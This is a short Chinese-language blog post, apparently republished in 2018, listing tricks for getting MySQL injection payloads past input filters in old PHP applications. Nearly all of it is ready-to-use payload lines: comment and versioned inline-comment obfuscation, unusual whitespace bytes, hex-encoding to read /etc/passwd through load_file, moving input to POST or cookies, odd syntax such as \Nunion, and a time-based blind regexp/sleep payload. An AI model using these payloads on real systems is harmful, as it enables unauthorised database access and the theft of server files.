mysql注入繞過的一些技巧
阿新 • • 發佈:2018-12-30
雖然mysql + php的開發中可以使用pdo中,但是有些老久的程式沒有使用,或其他原因
1.註釋繞過
select/*comment*/user/*zzsdsdsf*/from mysql.user;
2.內聯註釋繞過
/*!12345select*//*!12345user*/ from mysql.user;
3.特殊空白字元繞過
在php中\s會匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20
但是在mysql中空白字元為 0x09,0x0a,0x0b,0x0c,0x0d,0x20,0xa0
0xa0有時候有奇效
0x0a和0x0d會影響"."的匹配,有時候也是可以利用的
4.十六進位制繞過
select load_file('0x2f6574632f706173737764');
python
>>> '/etc/passwd'.encode('hex')
'2f6574632f706173737764'
5.換一種提交姿勢繞過
有時候程式設計師只過濾了GET中的危險字元,可以試試POST,COOKIES甚至是FILES
6.mysql黑魔法繞過
select{x user}from {x mysql.user};
select user from mysql.user where 1=\Nunion [email protected];
select user from mysql.user where 1=\Nunion select-.1;
select~2.1from xxxx
select-2.1from xxx
select~2e1from xxx
if((select%0b(select(xxx)``from(xxx))regexp(0x5e61)),(`sleep`(5)),0)